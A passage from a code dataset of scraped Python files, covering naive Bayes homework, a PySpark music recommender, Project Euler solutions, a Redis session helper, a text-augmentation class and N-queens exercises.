--> add your Python code here\r\nweatherTest = []\r\nwith open('weather_test.csv', 'r') as csvfile:\r\n    reader = csv.reader(csvfile)\r\n    for i, row in enumerate(reader):\r\n        if i > 0: # skipping the header\r\n            weatherTest.append(row)\r\nX_test = []\r\nfor row in weatherTest:\r\n    temp = []\r\n    for i in range(1, 5):\r\n        if 
row[i] == \"Sunny\" or row[i] == \"Hot\" or row[i] == \"High\" or row[i] == \"Weak\":\r\n temp.append(1)\r\n elif row[i] == \"Overcast\" or row[i] == \"Mild\" or row[i] == \"Normal\" or row[i] == \"String\":\r\n temp.append(2)\r\n else:\r\n temp.append(3)\r\n X_test.append(temp)\r\n\r\n# printing the header os the solution\r\nprint(\"Day\".ljust(15) + \"Outlook\".ljust(15) + \"Temperature\".ljust(15) + \"Humidity\".ljust(15) + \"Wind\".ljust(15) + \"PlayTennis\".ljust(15) + \"Confidence\".ljust(15))\r\n\r\n# use your test samples to make probabilistic predictions.\r\n# --> add your Python code here\r\n# -->predicted = clf.predict_proba([[3, 1, 2, 1]])[0]\r\npredictions = clf.predict(X_test)\r\nfor i, row in enumerate(X_test):\r\n confidence = clf.predict_proba([row])[0]\r\n # Yes == 1\r\n if confidence[0] >= 0.75 and predictions[i] == 1:\r\n print(weatherTest[i][0].ljust(15) + weatherTest[i][1].ljust(15) + weatherTest[i][2].ljust(15) + weatherTest[i][3].ljust(15) + weatherTest[i][4].ljust(15) + \"Yes\".ljust(15) + str(confidence[0]).ljust(15))\r\n","sub_path":"Assignment 2/naive_bayes.py","file_name":"naive_bayes.py","file_ext":"py","file_size_in_byte":3531,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"271157987","text":"import pickle\nimport copy\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfrom mne.stats import spatio_temporal_cluster_1samp_test\n\nfrom gat.plot import (plot_widths, plot_gat_times, plot_mean_pred)\n\nfrom scripts.config import (\n epochs_params,\n passive, active,\n scorer_spearman\n)\n\n# Apply contrast on each type of epoch\nep = epochs_params[0]\n\n\nanalysis = dict(name='ambiguities_regress', key='stim_category',\n include=active, exclude=passive,\n contrast='stim_category', generalization='ambiguity',\n scorer=scorer_spearman, chance=0.)\n\n# pkl_fname = 'data/ambiguity/MEG/fsaverage/stim_lock-decod_ambiguity.pickle_score.pickle'\n# with open(pkl_fname, 'r') as f:\n# scores, gat, events_list = pickle.load(f)\n\n\ndef load_scores(ep_name='stim_lock', decim=2):\n pkl_fname = 'data/ambiguity/MEG/fsaverage/' + ep_name + '-decod_ambiguities_avg.pickle'\n with open(pkl_fname, 'r') as f:\n y_preds, scores, gat, events_list = pickle.load(f)\n y_preds = np.array(y_preds)[:, ::decim, ::decim, :, :]\n scores = np.array(scores)[:, ::decim, ::decim]\n\n gat_list = list()\n for score, y_pred in zip(scores, y_preds):\n gat_ = copy.deepcopy(gat)\n gat_.scores_ = np.array(score)\n gat_.y_pred_ = np.array(y_pred)\n gat_.y_pred_ = gat_.y_pred_\n gat_.scores_ = gat_.scores_\n gat_.train_times_['step'] *= decim\n gat_.test_times_['step'] *= decim\n gat_.train_times_['times'] = gat_.train_times_['times'][::decim]\n gat_.test_times_['times'] = gat_.test_times_['times'][::decim]\n for idx in range(len(gat_.test_times_['times'])):\n gat_.test_times_['times'][idx] = gat_.test_times_['times'][idx][::decim]\n gat_.y_train_ = np.linspace(0, 1, 8)\n gat_.train_times_['slices'] = gat_.train_times_['slices'][::decim]\n gat_.test_times_['slices'] = gat_.test_times_['slices'][::decim]\n for idx in range(len(gat_.test_times_['slices'])):\n gat_.test_times_['slices'][idx] = gat_.test_times_['slices'][idx][::decim]\n gat_list.append(gat_)\n\n ## run part of run_stats_decoding.p\n return gat_list, events_list, 
analysis\n","sub_path":"sandbox/decoding/load_some_scores.py","file_name":"load_some_scores.py","file_ext":"py","file_size_in_byte":2194,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
{"seq_id":"214742765","text":"deck = []\ndeck += [Neonate] * 4\ndeck += [Bloodghast] * 4\ndeck += [Amalgam] * 4\ndeck += [Imp] * 4\ndeck += [Troll] * 4\ndeck += [Thug] * 1\ndeck += [Narco] * 4\ndeck += [Looting] * 4\ndeck += [Voice] * 4\ndeck += [Loam] * 3\ndeck += [Conflagrate] * 3\ndeck += [Fetch] * 5\ndeck += [Gorge] * 4\ndeck += [Mountain] * 3\ndeck += [Salvage] * 2\ndeck += [Crypt] * 2\ndeck += [Stomping] * 2\ndeck += [Gemstone] * 3\n\nassert len(deck) == 60\n\n\nrandom.shuffle(deck)\n","sub_path":"dredge/dredge.py","file_name":"dredge.py","file_ext":"py","file_size_in_byte":441,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
{"seq_id":"515163183","text":"from lastfm_dataset_1K_preprocess import *\nfrom pyspark.ml.evaluation import RegressionEvaluator\nfrom pyspark.ml.recommendation import ALS\nfrom pyspark.sql import Row\nfrom pyspark.sql.functions import *\nfrom pyspark.sql.window import Window\nimport pyspark.sql.functions as sf\nfrom pyspark.sql.functions import col\nfrom history_subset import *\nfrom pyspark.ml.feature import VectorAssembler, MinHashLSH\nfrom pyspark.ml.feature import BucketedRandomProjectionLSH\nfrom pyspark.mllib.linalg import Vectors\nfrom pyspark.ml.linalg import SparseVector\nfrom pyspark.sql.types import FloatType\nfrom scipy.spatial import distance\nfrom sklearn.metrics import pairwise_distances\n\n\n\n# 1. loading training subset \"lastfm_dataset/top_20_Percent_song_fractional_intID_history.parquet\"\n# 2. generate user-item matrix\n# 3.\nclass item_based_recommentdation(object):\n    spark = init_spark(object)\n    df = None\n    training = None\n    test = None\n    train_matrix = None\n    test_matrix = None\n    model = None\n\n\n    def init_spark(self):\n        spark = SparkSession \\\n            .builder \\\n            .appName(\"Python Spark SQL basic example\") \\\n            .config(\"spark.some.config.option\", \"some-value\") \\\n            .getOrCreate()\n        return spark\n\n\n    def generate_user_items_model(self):\n        self.df = spark.read.parquet(\"lastfm_dataset/top_20_Percent_song_fractional_intID_history.parquet\")\n        (self.training, self.test) = self.df.randomSplit([0.8, 0.2], seed=100)\n\n        self.train_matrix = self.get_matrix(self.training)\n\n        # build a song matrix (vector * n) from the test set\n        self.test = spark.read.parquet(\"lastfm_dataset/test_5000.parquet\")\n        self.test.groupby('id_user').count().show()\n\n        # self.test_matrix = self.get_matrix(self.test)\n        # the test set should look up each track's id in train_matrix\n        self.test_matrix = self.train_matrix.join(self.test,['id_track']).select('id_track','features')\n        print(\"test matrix\")\n        self.test_matrix.show();\n\n        # 1. does it matter if the test set is fully contained in the train set?\n        brp = BucketedRandomProjectionLSH(inputCol=\"features\", outputCol=\"hashes\", bucketLength=2.0,\n                                          numHashTables=3)\n        self.model = brp.fit(self.train_matrix)\n\n\n\n\n    def get_matrix(self,df):\n        limitation = 8\n        # pair(id_track,(id_user,count))\n        # option1: build the vector from counts\n        rdd = df.rdd.filter(lambda x: x['count'] > limitation).map(lambda x: (x.id_track, [(x.id_user, x['count'])]))\n        # option2: build the vector from 0/1\n        #rdd = df.rdd.map(lambda x: (x.id_track, [(x.id_user, 1)]))\n        # pair(id_track,[(id_user,fractional_count),(id_user,fractional_count)])\n        rdd = rdd.reduceByKey(lambda a, b: a + b)\n        print(rdd.first())\n        # rdd = rdd.map(lambda x: (x[0], SparseVector(len(x[1]), 
x[1])))\n        # there are at most 1000 users, so use a 1000-dim vector; id_user ranges over [0-999], and each (id_user, count) pair defines the SparseVector with value count at index id_user.\n        rdd = rdd.map(lambda x: (x[0], SparseVector(1000, x[1])))\n        matrix = spark.createDataFrame(rdd, ['id_track', 'features'])\n        return matrix\n\n    # user_df = get_user_items(train_df, train_matrix, id_user)\n    def get_user_items(self,history_df, matrix_df, userid):\n        user_df = history_df.filter(history_df['id_user'] == userid).select('id_user', 'id_track', 'count')\n        matrix_df = matrix_df.join(user_df, ['id_track'])\n        matrix_df.show()\n        return matrix_df\n\n    def get_test_all_user_items_pair(self, train_df, train_maxtrix, test_df):\n        # select the history data of all users in the test set\n        # pick each user's listening history from the training set\n        # ()\n        train_df = train_df.alias(\"a\").join(\n            test_df.alias(\"b\"), ['id_user']).select('a.id_user','a.id_track','a.count','a.fractional_count').distinct()\n\n        # join the features onto the history data\n        matrix_df = train_df.join(train_maxtrix, ['id_track'])\n        print(\"get_test_all_user_items_pair\")\n        matrix_df.show()\n        # +--------+-------+-----+--------------------+\n        # |id_track|id_user|count|            features|\n        # +--------+-------+-----+--------------------+\n        # |      29|    830|   12|(1000,[30,72,73,8...|\n        return matrix_df\n\n\n    def get_score(self,sim_df, train_df, id_user):\n        # sim_df : id,sim\n        id_track_list = sim_df.select(\"id_track\").rdd.flatMap(lambda x: x).collect()\n        user_track_df = train_df.filter((train_df.id_user == id_user) & (col('id_track').isin(id_track_list)))\n        full_df = sim_df.join(user_track_df, ['id_track'], how='left')\n        score = full_df.withColumn('score', 1/col('distCol') * col('count')).agg(avg(col('score')))\n        # user_track_df.show()\n        # full_df.show()\n        # score.show()\n        score = score.rdd.flatMap(lambda x: x).collect()[0]\n        # print(score)\n        return score\n\n\n    def get_predcit_single_user(self, id_user, train_df, train_matrix, test_matrix):\n\n        user_df = self.get_user_items(train_df, train_matrix, id_user)\n        similar = self.model.approxSimilarityJoin(user_df, test_matrix, 1000, \"JaccardDistance\")\n        items_similarity = pairwise_distances(train_matrix.T, metric='cosine')\n        similar = similar.select(col('datasetA.id_user').alias('id_user'),\n                                 col('datasetA.id_track').alias('user_listen'),\n                                 col('datasetA.count').alias('count'),\n                                 col('datasetB.id_track').alias('test_song'),\n                                 col('distCol')).where(col('user_listen') != col('test_song'))\n        window = Window.partitionBy('test_song').orderBy('distCol')\n        # select top k similar songs\n        similar = similar.select('*', rank().over(window).alias('rank')).filter(col('rank') <= 5)\n        # id_user|user_listen|count|test_song|           distCol|rank|\n        #      19|      20608|    1|     4590|               7.0|   1|\n        #      19|      20927|    4|     4590| 8.306623862918075|   2|\n        return similar\n\n        similar.show()\n\n\n\n    def get_predcit_multiple_users(self):\r\n        # train_df, train_matrix, test_matrix, test\r\n        # compute the similarity for all test tracks for each user in one go\r\n        all_user_history_df = self.get_test_all_user_items_pair(self.training, self.train_matrix, self.test)\r\n        track_num = self.test.select('id_track').distinct().count()\r\n        user_num = self.test.select('id_user').distinct().count()\r\n        print(\"track_num: %d\" % track_num)\r\n        print(\"user_num: %d\" % user_num)\r\n\r\n\r\n        similar = self.model.approxSimilarityJoin(all_user_history_df, self.test_matrix, 1000, distCol=\"JaccardDistance\")\r\n\r\n        similar = similar.select(col('datasetA.id_user').alias('id_user'),\r\n                                 col('datasetA.id_track').alias('user_listen'),\r\n                                 col('datasetA.count').alias('count'),\r\n                                 col('datasetA.fractional_count').alias('fractional_count'),\r\n                                 
col('datasetB.id_track').alias('test_song'),\r\n                                 # col('distCol')\r\n                                 col('JaccardDistance').alias('distCol')\r\n                                 ).where(col('user_listen') != col('test_song'))\r\n\r\n        # similar.write.parquet(\"model/similar_matrix_5000test_jaccard.parquet\")\r\n\r\n        window = Window.partitionBy('id_user', 'test_song').orderBy('distCol')\r\n        similar = similar.select('*', rank().over(window).alias('rank')).filter(col('rank') <= 5)\r\n        # id_user|user_listen|count|test_song|           distCol|rank|\r\n        #      19|      20608|    1|     4590|               7.0|   1|\r\n        #      19|      20927|    4|     4590| 8.306623862918075|   2|\r\n        print(similar.count())\r\n\r\n        similar.show()\r\n        score_df = similar.withColumn('similar', (1-col('distCol')))\r\n        score_df = score_df.withColumn('score_temp', col('similar') * col('count'))\r\n        score_df = score_df.groupby('id_user', 'test_song').agg(sum('score_temp').alias('sum_score'),sum((col('similar'))).alias('sum_similar'))\r\n        score_df = score_df.withColumn('score', col('sum_score') / col('sum_similar'))\r\n        score_df.show()\r\n        print(score_df.count())\r\n\r\n        score_df.sort('id_user').show()\r\n        self.evaluate(score_df, self.test)\r\n\r\n        return similar\r\n\r\n\r\n    def evaluate(self,predictions, test_df):\r\n        # predictions mark the songs that were not listened to\r\n        rank = predictions.withColumn('rank', row_number().over(Window.partitionBy('id_user').orderBy(desc('score'))))\r\n\r\n        cond = [rank.id_user == test_df.id_user, rank.test_song == test_df.id_track]\r\n        # expand the test df,\r\n        predictions = rank.join(test_df, cond, how='left').drop(test_df.id_user).fillna(0)\r\n\r\n\r\n        print(\"MPR step 1\")\r\n        print(predictions.count())\r\n        # test1.filter(test1['id_user'] == 26).show()\r\n        listend_song = predictions.where(col('count') > 0).groupby('id_user').agg(count('*').alias('listened_song'))\r\n        nolistend_song = predictions.where(col('count') == 0).groupby('id_user').agg(count('*').alias('not_listened'))\r\n        listend_song.join(nolistend_song, on=['id_user']).show()\r\n\r\n        # predictions.where(col('id_user') == 498).sort(col(\"rank\")).show()\r\n        # predictions.where(col('id_user') == 754).sort(col(\"rank\")).show()\r\n        # predictions.where(col('id_user') == 443).sort(col(\"rank\")).show()\r\n        # predictions.where(col('id_user') == 304).sort(col(\"rank\")).show()\r\n        # predictions.where(col('id_user') == 871).sort(col(\"rank\")).show()\r\n        # predictions.where(col('id_user') == 181).sort(col(\"rank\")).show()\r\n        # predictions.where(col('id_user') == 621).sort(col(\"rank\")).show()\r\n\r\n        n_tracks = test_df.select('id_track').distinct().count()\r\n        # predictions.withColumn('rank', row_number().over(Window.partitionBy('id_user').orderBy(desc('score'))))\r\n\r\n        MPR = predictions\\\r\n            .where(col('fractional_count') > 0) \\\r\n            .groupby('id_user') \\\r\n            .agg(\r\n                count('*').alias('n'),\r\n                sum(1 - col('score')).alias('sum_pred'),\r\n                sum(col('rank') / n_tracks).alias('sum_perc_rank'),\r\n                min('rank').alias('min_rank')\r\n            ) \\\r\n            .agg(\r\n                (sum('sum_pred') / sum('n')).alias('avg 1-score'),\r\n                (sum('sum_perc_rank') / sum('n')).alias('MPR'), # the lower the better\r\n                mean(1 / col('min_rank')).alias('MRR') # the higher the better\r\n            ) \\\r\n            .withColumn('MPR*k', col('MPR') * n_tracks) \\\r\n            .withColumn('1/MRR', 1 / col('MRR'))\r\n\r\n        MPR.show()\r\n\r\n\r\n        predictions = predictions.select('id_user', 'test_song', 'rank', 'track_id', 'count')\r\n        predictions.where(col('id_user') == 498).sort(col(\"rank\")).show()\r\n        predictions.where(col('id_user') == 385).sort(col(\"rank\")).show()\r\n        predictions.where(col('id_user') == 193).sort(col(\"rank\")).show()\r\n        predictions.where(col('id_user') == 181).sort(col(\"rank\")).show()\r\n        predictions.where(col('id_user') == 968).sort(col(\"rank\")).show()\r\n        
predictions.where(col('id_user') == 39).sort(col(\"rank\")).show()\n\n\n\n def load_and_evalaute_similar_matrix(self):\n\n similar = spark.read.parquet(\"model/similar_matrix_5000test_jaccard.parquet\")\n\n window = Window.partitionBy('id_user', 'test_song').orderBy('distCol')\n\n similar = similar.select('*', rank().over(window).alias('rank')).filter(col('rank') <= 5)\n # id_user|user_listen|count|test_song| distCol|rank|\n # 19| 20608| 1| 4590| 7.0| 1|\n # 19| 20927| 4| 4590| 8.306623862918075| 2|\n print(similar.count())\n similar.show()\n score_df = similar.withColumn('similar', (1-col('distCol')))\n score_df = score_df.withColumn('score_temp', col('similar') * col('count'))\n score_df = score_df.groupby('id_user', 'test_song').agg(sum('score_temp').alias('sum_score'),sum((col('similar'))).alias('sum_similar'))\n score_df = score_df.withColumn('score', col('sum_score') / col('sum_similar'))\n score_df.show()\n print(score_df.count())\n\n score_df.sort('id_user').show()\n self.evaluate(score_df, self.test)\n\n\n\n\nmodel = item_based_recommentdation()\n\nmodel.generate_user_items_model()\n\n# # train a new model\n# model.get_predcit_multiple_users()\n\n# loading from model file\nmodel.load_and_evalaute_similar_matrix()\n","sub_path":"item_based_recommentdation.py","file_name":"item_based_recommentdation.py","file_ext":"py","file_size_in_byte":12604,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"403723771","text":"\"\"\"\nproblem3\n---\nThe prime factors of 13195 are 5, 7, 13 and 29.\nWhat is the largest prime factor of the number 600851475143 ?\n\"\"\"\nimport math\n\ndef is_prime(q):\n q = abs(q)\n if q == 2: return True\n if q < 2 or q&1 == 0: return False\n return pow(2, q-1, q) == 1\n\nif __name__ == '__main__':\n N = 600851475143\n\n begin_num = 2\n end_num = math.ceil(math.sqrt(N))\n\n processing_data = [i for i in range(begin_num, end_num) if (i%2!=0) and (i%3!=0) and (i%5!=0) and is_prime(i)]\n\n n = max(filter(lambda i: N%i == 0, processing_data))\n print(n)","sub_path":"src/problem3.py","file_name":"problem3.py","file_ext":"py","file_size_in_byte":565,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"191703847","text":"def myPrice():\n global buah\n harga = list(buah.values())\n harga.sort(reverse=True)\n mahal = harga[0]\n for buah, harga in buah.items():\n if harga == mahal:\n return buah\n\nbuah = {'apel' : 5000, 'jeruk' : 8500, 'mangga' : 7800, 'duku' : 6500}\nprint(myPrice())\n","sub_path":"Chapter 8/Python Project 7.py","file_name":"Python Project 7.py","file_ext":"py","file_size_in_byte":290,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"203192951","text":"## ---------------------------- ##\n## \n## aileen_benedict.py\n## 09.29.2018\n##\n## Train an image classifier to classify images by number of fingers.\n##\n## ---------------------------- ##\n\n\nimport numpy as np\n#It's kk to import whatever you want from the local util module if you would like:\n#from util.X import ... \n\ndef count_fingers(im):\n '''\n Example submission for coding challenge. 
\n    \n    Args: im (nxm) unsigned 8-bit grayscale image \n    Returns: One of three integers: 1, 2, 3\n    \n    '''\n    \n    # Pad images first since images are cropped and not the same size\n    padded = np.zeros((70,50))\n    x_offset = int(np.ceil((padded.shape[0] - im.shape[0]) / 2))\n    y_offset = int(np.ceil((padded.shape[1] - im.shape[1]) / 2))\n    # When padding, put original image in the middle-ish\n    padded[x_offset:im.shape[0]+x_offset,y_offset:im.shape[1]+y_offset] = im\n\n    teehee = padded.ravel()\n\n    # Now use if statements from my decision tree thingy :D~\n    if teehee[1075] <= 24.5:\n        return 1\n    elif teehee[1082] <= 71.0:\n        return 2\n    else:\n        return 3\n","sub_path":"2. Learning to See/challenge/aileen_benedict.py","file_name":"aileen_benedict.py","file_ext":"py","file_size_in_byte":1088,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
{"seq_id":"525315209","text":"import sys, time\nfrom hbdm_encodeV5 import get_chunk_info\nfrom hbdm_decodeV4 import read_encoded, decode\nfrom chunk_fileV3_1 import chunk\n\n# https://rosettacode.org/wiki/Longest_Common_Substring#Python on 19/08/15\n\ndef lcs_str(f1, f2):\n\ts1 = read_encoded(f1)\n\ts2 = read_encoded(f2)\n\tlen1, len2 = len(s1), len(s2)\n\tir, jr = 0, 0\n\tfor i1 in range(len1):\n\t    i2 = s2.find(s1[i1])\n\t    while i2 >= 0:\n\t        j1, j2 = i1+1, i2+1\n\t        while j1 < len1 and j2 < len2 and s2[j2] == s1[j1]:\n\t            if j1-i1 > jr-ir:\n\t                ir, jr = i1, j1\n\t            j1 += 1; j2 += 1\n\t        i2 = s2.find(s1[i1], i2+1)\n\tprint (s1[ir:jr+1])\n\ndef lcs(f1, f2):\n\ts1 = read_encoded(f1)\n\ts2 = read_encoded(f2)\n\tlen1, len2 = len(s1), len(s2)\n\tir, jr = 0, 0\n\tfor i1 in range(len1):\n\t\tif s1[i1] in s2:\n\t\t\ti2 = s2.index(s1[i1])\n\t\t\t#i2 = s2.find(s1[i1])\n\t\t\twhile i2 >= 0:\n\t\t\t\tj1, j2 = i1+1, i2+1\n\t\t\t\twhile j1 < len1 and j2 < len2 and s2[j2] == s1[j1]:\n\t\t\t\t\tif j1-i1 > jr-ir:\n\t\t\t\t\t\tir, jr = i1, j1\n\t\t\t\t\tj1 += 1; j2 += 1\n\t\t\t\ttry:\n\t\t\t\t\ti2 = s2.index(s1[i1], i2+1)\n\t\t\t\tfinally:\n\t\t\t\t\tbreak\n\tresult = s1[ir:jr+1]\n\twrite_file('lcsstr.data.encoded', result)\n\ndef write_file(filename, content):\n    file = open(filename, 'wb')\n\n    for pair in content:\n        file.write(pair)\n\n    file.close()\n\n\ndef main():\n\tlcs(sys.argv[1], sys.argv[2])\n\nif __name__ == \"__main__\":\n    main()","sub_path":"lcsstr.py","file_name":"lcsstr.py","file_ext":"py","file_size_in_byte":1358,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
{"seq_id":"500070370","text":"#While loop structure\r\n\r\nc = 1\r\npar = inpar = 0\r\nwhile c != 0:\r\n    c = int(input('Enter a number? : '))\r\n    if c != 0:\r\n        if c % 2 == 0:\r\n            par += 1\r\n        else:\r\n            inpar += 1\r\nprint('You typed {} EVEN and {} ODD numbers'.format(par, inpar))","sub_path":"mark87.py","file_name":"mark87.py","file_ext":"py","file_size_in_byte":289,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
{"seq_id":"275379073","text":"# -*- coding: utf-8 -*-\n# Part of Odoo. 
See LICENSE file for full copyright and licensing details.\n\nfrom odoo import models, api\n\n\nclass BillableExpenseReport(models.AbstractModel):\n _inherit = 'billable.expense.report'\n\n @api.multi\n def open_purchase_expense(self, options, params=None):\n if not params:\n params = {}\n ctx = self.env.context.copy()\n ctx.pop('id', '')\n expense_id = params.get('id')\n document = params.get('object', 'purchase.order')\n if expense_id:\n expense = self.env['billable.expenses'].browse(expense_id)\n purchase_id = expense.purchase_id.id\n view_id = self.env['ir.model.data'].get_object_reference('purchase', 'purchase_order_form')[1]\n return {\n 'type': 'ir.actions.act_window',\n 'view_type': 'tree',\n 'view_mode': 'form',\n 'views': [(view_id, 'form')],\n 'res_model': document,\n 'view_id': view_id,\n 'res_id': purchase_id,\n 'context': ctx,\n }\n","sub_path":"src/custom/purchase_billable_expense/report/billable_expense_report.py","file_name":"billable_expense_report.py","file_ext":"py","file_size_in_byte":1105,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"279188882","text":"class Solution:\n def removeElement(self, nums: List[int], val: int) -> int:\n if nums == None:\n return 0\n j = 0\n while j < len(nums):\n if nums[j] == val:\n del nums[j]\n else:\n j += 1\n return len(nums)\n","sub_path":"python/removeElement.py","file_name":"removeElement.py","file_ext":"py","file_size_in_byte":261,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"193684191","text":"n1 = 1\nresults = [1]\nlimit = 10000\ndigits = 999\nfor n in range (1,limit):\n results.append(n1)\n n1 = n1 + results[n-1]\n if len(str(results[n])) > digits:\n print(results[n])\n print(\"Index\", n+1)\n exit()\n\n","sub_path":"Euler_25.py","file_name":"Euler_25.py","file_ext":"py","file_size_in_byte":232,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"309763919","text":"\"\"\"\n Augmenter that apply word2vec's based operation to textual input.\n\"\"\"\n\nfrom nlpaug.augmenter.word import WordEmbsAugmenter\nfrom nlpaug.util import Action\nimport nlpaug.model.word_embs as nmw\nfrom nlpaug.util.decorator.deprecation import deprecated\n\nWORD2VEC_MODEL = None\n\n\ndef init_word2vec_model(model_path, force_reload=False):\n \"\"\"\n Load model once at runtime\n \"\"\"\n global WORD2VEC_MODEL\n if WORD2VEC_MODEL and not force_reload:\n return WORD2VEC_MODEL\n\n word2vec = nmw.Word2vec()\n word2vec.read(model_path)\n WORD2VEC_MODEL = word2vec\n\n return WORD2VEC_MODEL\n\n\n@deprecated(deprecate_from='0.0.7', deprecate_to='0.0.9', msg=\"Use WordEmbsAug from 0.0.7 version\")\nclass Word2vecAug(WordEmbsAugmenter):\n \"\"\"\n Augmenter that leverage word2vec's embeddings to find top n similar word for augmentation.\n\n :param str model_path: Downloaded model directory. Either model_path or model is must be provided\n :param obj model: Pre-loaded model\n :param str action: Either 'insert or 'substitute'. If value is 'insert', a new word will be injected to random\n position according to word embeddings calculation. 
If value is 'substitute', word will be replaced according\n to word embeddings calculation\n :param int aug_min: Minimum number of word will be augmented.\n :param float aug_p: Percentage of word will be augmented.\n :param int aug_n: Top n similar word for lucky draw\n :param list stopwords: List of words which will be skipped from augment operation.\n :param func tokenizer: Customize tokenization process\n :param func reverse_tokenizer: Customize reverse of tokenization process\n :param bool force_reload: If True, model will be loaded every time while it takes longer time for initialization.\n :param str name: Name of this augmenter\n\n >>> import nlpaug.augmenter.word as naw\n >>> aug = naw.Word2vecAug()\n \"\"\"\n\n def __init__(self, model_path='.', model=None, action=Action.SUBSTITUTE,\n name='Word2vec_Aug', aug_min=1, aug_p=0.3, aug_n=5, stopwords=None,\n tokenizer=None, reverse_tokenizer=None, force_reload=False, verbose=0):\n super().__init__(\n model_path=model_path, aug_n=aug_n,\n action=action, name=name, aug_p=aug_p, aug_min=aug_min, stopwords=stopwords,\n tokenizer=tokenizer, reverse_tokenizer=reverse_tokenizer, verbose=verbose)\n\n if model is None:\n self.model = self.get_model(force_reload=force_reload)\n else:\n self.model = model\n\n def get_model(self, force_reload=False):\n return init_word2vec_model(self.model_path, force_reload)\n","sub_path":"nlpaug/augmenter/word/word2vec.py","file_name":"word2vec.py","file_ext":"py","file_size_in_byte":2669,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"427685511","text":"#!/usr/bin/python\n# -*- coding:utf-8 -*-\n# vim: tabstop=4 shiftwidth=4 softtabstop=4\n# copyright 2016 Wshuai, Inc.\n# All Rights Reserved.\n\n# @author: WShuai Inc.\n\nimport uuid\nimport time\n\nclass CommSession(object):\n def __init__(self, redis_handler, LOG, expire_time = None):\n self.expire_time = expire_time\n self.redis_handler = redis_handler\n self.LOG = LOG\n self.session = None\n return\n\n def save_session(self, user_name):\n self.session = str(uuid.uuid4()).replace('-','').upper()\n self.update_session(self.session, user_name)\n return self.session\n\n def update_session(self, session, user_name):\n now = self.redis_handler.redis_conn.time()[0]\n expire_time = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(now + self.expire_time))\n items = {\n 'user_name': user_name,\n 'expire': expire_time\n }\n self.redis_handler.redis_conn.hmset('%s:%s' % (user_name, session), items)\n self.redis_handler.redis_conn.expire('%s:%s' % (user_name, session), self.expire_time)\n return\n\n def auth_session(self, session, user_name):\n ret = False\n try:\n session_user_name = self.redis_handler.redis_conn.hget('%s:%s' % (user_name, session), 'user_name')\n if session_user_name == user_name:\n self.LOG.info('this user [%s] session [%s] is successful!' % (user_name, session))\n ret = True\n else:\n self.LOG.info('this user [%s] session [%s] is unmatched!' % (user_name, session))\n self.update_session(session, user_name)\n ret = False\n except:\n self.LOG.error('this user [%s] session [%s] is expired!' 
% (user_name, session))\n            ret = False\n        return ret\n\n    def verify_repeat_login(self, user_name):\n        keys = self.redis_handler.redis_conn.keys('%s:*' % user_name)\n        if not keys:\n            return True\n        else:\n            return False\n\n    def remove_session(self, session, user_name):\n        self.redis_handler.redis_conn.delete('%s:%s' % (user_name, session))\n        return\n\n","sub_path":"src/common/commSession.py","file_name":"commSession.py","file_ext":"py","file_size_in_byte":2170,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
{"seq_id":"214315890","text":"from ProcessData.BrakingModules.python_wrapper_braking import getbrakinginfo\nimport numpy as np\n\nLATENCY = 1\nDRIVER_RESPONSE = 1\n\ndef checkBraking(velocity, distance, safe_time = 5):\n    braking_distance, arrival_time = getbrakinginfo(velocity)\n\n    safe_distance = (safe_time + LATENCY+DRIVER_RESPONSE) * velocity + braking_distance\n    critical_distance = (LATENCY+DRIVER_RESPONSE)*velocity + braking_distance\n\n    if distance < critical_distance:\n        return 1\n    if distance <= safe_distance :\n        maxtime = safe_time # interval : [t_L + t_d <= t <= (dis_safe-dis_brake)/velocity)\n        mintime = (LATENCY + DRIVER_RESPONSE)\n        x = (distance-braking_distance)/velocity - (maxtime + mintime)/2\n        return 1-(1/(1+np.exp(-x)))\n    return 0\n\n\n\n\n\n\n\n","sub_path":"ProcessData/BrakingModules/check_braking.py","file_name":"check_braking.py","file_ext":"py","file_size_in_byte":779,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
{"seq_id":"640076412","text":"from collections import deque\nfrom itertools import permutations\nimport string\n\n# Opdracht 1\nprint(\"\\n\\nOpdracht 1 \")\n\ndef check(a,i): # check whether i can be added to a\n    n = len(a)\n    return not (i in a or\n                # not in the same column\n                i+n in [a[j]+j for j in range(n)] or\n                # not on the same diagonal\n                i-n in [a[j]-j for j in range(n)])\n                # not on the same diagonal\n\ndef printQueens(a):\n    n = len(a)\n    for i in range(n):\n        for j in range(n):\n            if a[i] == j:\n                print(\"X\",end= \" \")\n            else:\n                print(\"*\",end= \" \")\n        print(\"\\n\")\n\ndef rsearch(N):\n    global a\n    for i in range(N):\n        if check(a,i):\n            a.append(i)\n            if len(a) == N and a not in b:\n                b.append(a)\n                a = []\n                return True # suitable a found\n            else:\n                if rsearch(N):\n                    rsearch(N)\n                    return True\n            del a[-1] # remove the last element\n    return False\na = [] # a gives the column position for each row\nb = []\nt = 0\n\nrsearch(6)\n# print(a)\n#printQueens(a)\nprint(b)\n\n\n# Opdracht 2\nprint(\"\\n\\nOpdracht 2 \")\nclass ListNode:\n    def __init__(self,data,next_node):\n        self.data = data\n        self.next = next_node\n\n    def __repr__(self):\n        return str(self.data)\n\nclass MyCircularList:\n    def __init__(self):\n        self.tail = None\n\n    def __repr__(self):\n        s = ''\n        current = self.tail.next\n        if current:\n            s = s + str(current)\n            current = current.next\n            while current != self.tail.next:\n                s = 